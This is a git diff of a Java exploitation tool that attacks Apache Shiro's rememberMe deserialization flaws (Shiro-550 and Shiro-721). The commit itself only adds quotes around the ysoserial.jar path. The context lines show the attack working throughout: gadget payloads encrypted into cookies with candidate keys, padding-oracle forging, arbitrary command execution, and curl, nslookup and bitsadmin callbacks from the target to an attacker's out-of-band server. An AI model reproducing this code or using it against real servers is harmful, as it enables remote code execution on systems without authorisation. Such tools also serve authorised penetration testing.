diff --git a/src/main/java/com/shiroexploit/server/BasicHTTPServer.java b/src/main/java/com/shiroexploit/server/BasicHTTPServer.java index d041f3d..4ae024e 100644 --- a/src/main/java/com/shiroexploit/server/BasicHTTPServer.java +++ b/src/main/java/com/shiroexploit/server/BasicHTTPServer.java @@ -104,7 +104,7 @@ private static void handleJRMPRequest(HttpExchange exchange) throws IOException{ Thread thread = new Thread(new Runnable() { @Override public void run() { - String command = "java -cp " + System.getProperty("user.dir") + File.separator + "ysoserial.jar ysoserial.exploit.JRMPListener " + BasicHTTPServer.JRMPPort + " " + type + " \"" + finalCmd +"\""; + String command = "java -cp \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" ysoserial.exploit.JRMPListener " + BasicHTTPServer.JRMPPort + " " + type + " \"" + finalCmd +"\""; Tools.exec(command); } }); diff --git a/src/main/java/com/shiroexploit/task/SendURLDNSPayloadTask.java b/src/main/java/com/shiroexploit/task/SendURLDNSPayloadTask.java index 2e7783f..2e8b757 100644 --- a/src/main/java/com/shiroexploit/task/SendURLDNSPayloadTask.java +++ b/src/main/java/com/shiroexploit/task/SendURLDNSPayloadTask.java @@ -5,7 +5,6 @@ import com.shiroexploit.util.HttpRequest; import com.shiroexploit.util.Tools; import javafx.concurrent.Task; - import java.io.File; import java.util.List; @@ -26,7 +25,7 @@ protected Integer call() throws Exception { List keys = Config.getInstance().getKeys(); for(int i = 0; i < keys.size(); i++){ - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar URLDNS " + "http://" + (i+1) + "." + dns; + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" URLDNS " + "http://" + (i+1) + "." + dns; byte[] payload = Tools.exec(command); String rememberMe = AesEncrypt.encrypt(keys.get(i), payload); HttpRequest.request(Config.getInstance().getRequestInfo(), rememberMe); diff --git a/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifierWithOutJRMP.java b/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifierWithOutJRMP.java index 6b94c6a..7dce858 100644 --- a/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifierWithOutJRMP.java +++ b/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifierWithOutJRMP.java @@ -32,7 +32,7 @@ public void executeCmd(String cmd){ System.out.println("[*] Using Gadget " + type.getName()); System.out.println("[*] Executing command: " + cmd + "..."); - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + type.getName() + " \"" + cmd + "\""; + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + type.getName() + " \"" + cmd + "\""; byte[] result = Tools.exec(command); String rememberMe = AesEncrypt.encrypt(this.key, result); @@ -54,7 +54,7 @@ private void sendAllCurlPayloadsWithAllKeys() throws ExploitFailedException { //linux for(String key : config.getKeys()){ String uuid = UUID.randomUUID().toString().replaceAll("-", ""); - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "&type=" + payloadType.getName() + "\""; + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + payloadType.getName() + " \"curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "&type=" + payloadType.getName() + "\""; byte[] payload = Tools.exec(command); String rememberMe = AesEncrypt.encrypt(key, payload); HttpRequest.request(config.getRequestInfo(), rememberMe); @@ -66,7 +66,7 @@ private void sendAllCurlPayloadsWithAllKeys() throws ExploitFailedException { String uuid = UUID.randomUUID().toString().replaceAll("-", ""); String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp"; - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"" + command + "\""; + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + payloadType.getName() + " \"" + command + "\""; byte[] payload = Tools.exec(command); String rememberMe = AesEncrypt.encrypt(key, payload); diff --git a/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertUsingCeye.java b/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertUsingCeye.java index ba66b3e..eb6ba0e 100644 --- a/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertUsingCeye.java +++ b/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertUsingCeye.java @@ -46,7 +46,7 @@ public void executeCmd(String cmd){ System.out.println("[*] Using Key " + this.key); System.out.println("[*] Using Gadget " + type.getName()); System.out.println("[*] Executing command: " + cmd + "..."); - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + type.getName() + " \"" + cmd + "\""; + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + type.getName() + " \"" + cmd + "\""; byte[] result = Tools.exec(command); String rememberMe = AesEncrypt.encrypt(this.key, result); @@ -65,11 +65,11 @@ private Map sendAllCurlPayloads(){ String command; if(config.getPlatform() == 0){ //linux - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\""; + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + payloadType.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\""; }else{ //windows - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\""; + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + payloadType.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\""; } byte[] payload = Tools.exec(command); @@ -88,7 +88,7 @@ private Map sendURLDNSPayloads(){ for(String key : config.getKeys()){ System.out.println("[*] Trying Key: " + key); String uuid = UUID.randomUUID().toString().replaceAll("-", ""); - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar URLDNS " + "http://" + uuid + "." + config.getCeyeDomain(); + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" URLDNS " + "http://" + uuid + "." + config.getCeyeDomain(); byte[] payload = Tools.exec(command); String rememberMe = AesEncrypt.encrypt(key, payload); HttpRequest.request(config.getRequestInfo(), rememberMe); diff --git a/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertWithJRMP.java b/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertWithJRMP.java index 9e28935..9c4faec 100644 --- a/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertWithJRMP.java +++ b/src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertWithJRMP.java @@ -134,7 +134,7 @@ public PayloadType getType(String name){ private void process(PayloadType payloadType, String command, String key){ Tools.setJRMPServer(config.getOOBServerAddress(), config.getHTTPServicePort(), payloadType, command); - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort(); + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort(); byte[] payload = Tools.exec(command); String rememberMe = AesEncrypt.encrypt(key, payload); HttpRequest.request(config.getRequestInfo(), rememberMe); diff --git a/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithJRMP.java b/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithJRMP.java index c8a0b06..3b69135 100644 --- a/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithJRMP.java +++ b/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithJRMP.java @@ -60,7 +60,7 @@ public void executeCmd(String cmd){ Tools.setJRMPServer(config.getOOBServerAddress(), config.getHTTPServicePort(), gadget, cmd); - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort(); + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort(); byte[] result = Tools.exec(command); PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), result); String rememberMe = null; @@ -77,7 +77,7 @@ public void executeCmd(String cmd){ private void process(String command, PayloadType payloadType) throws ExploitFailedException { Tools.setJRMPServer(config.getOOBServerAddress(), config.getHTTPServicePort(), payloadType, command); - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort(); + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" JRMPClient " + config.getOOBServerAddress() + ":" + config.getJRMPServicePort(); byte[] payload = Tools.exec(command); PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), payload); String rememberMe = paddingOracle.encrypt(); diff --git a/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithOutJRMP.java b/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithOutJRMP.java index b3cbb04..333b289 100644 --- a/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithOutJRMP.java +++ b/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifierWithOutJRMP.java @@ -27,14 +27,14 @@ public void getValidGadget() throws ExploitFailedException { String command; if(config.getPlatform() == 0){ //linux - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + type.getName() + " \"curl http://" + config.getOOBServerAddress() + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + type.getName() + " \"curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "&type=" + type.getName() + "\""; }else{ //windows command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "%26type=" + type.getName() + " C:\\windows\\temp\\download_834723.tmp"; - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + type.getName() + " \"" + command + "\""; + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + type.getName() + " \"" + command + "\""; } byte[] result = Tools.exec(command); @@ -64,7 +64,7 @@ public void executeCmd(String cmd){ System.out.println("[*] Using Gadget " + gadget.getName()); System.out.println("[*] Executing command: " + cmd + "..."); - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + gadget.getName() + " \"" + cmd + "\""; + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + gadget.getName() + " \"" + cmd + "\""; byte[] result = Tools.exec(command); PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), result); String rememberMe = null; diff --git a/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifiertUsingCeye.java b/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifiertUsingCeye.java index 615c57d..efe79e5 100644 --- a/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifiertUsingCeye.java +++ b/src/main/java/com/shiroexploit/vulnverifier/Shiro721VerifiertUsingCeye.java @@ -30,11 +30,11 @@ public void getValidGadget() throws ExploitFailedException { String command; if(config.getPlatform() == 0){ //linux - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + type.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\""; + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + type.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\""; }else{ //windows - command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + type.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\""; + command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + type.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\""; } byte[] result = Tools.exec(command); @@ -65,7 +65,7 @@ public void executeCmd(String cmd){ System.out.println("[*] Using Gadget " + gadget.getName()); System.out.println("[*] Executing command: " + cmd + "..."); - String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + gadget.getName() + " \"" + cmd + "\""; + String command = "java -jar \"" + System.getProperty("user.dir") + File.separator + "ysoserial.jar\" " + gadget.getName() + " \"" + cmd + "\""; byte[] result = Tools.exec(command); PaddingOracle paddingOracle = new PaddingOracle(config.getRequestInfo(), result); String rememberMe = null;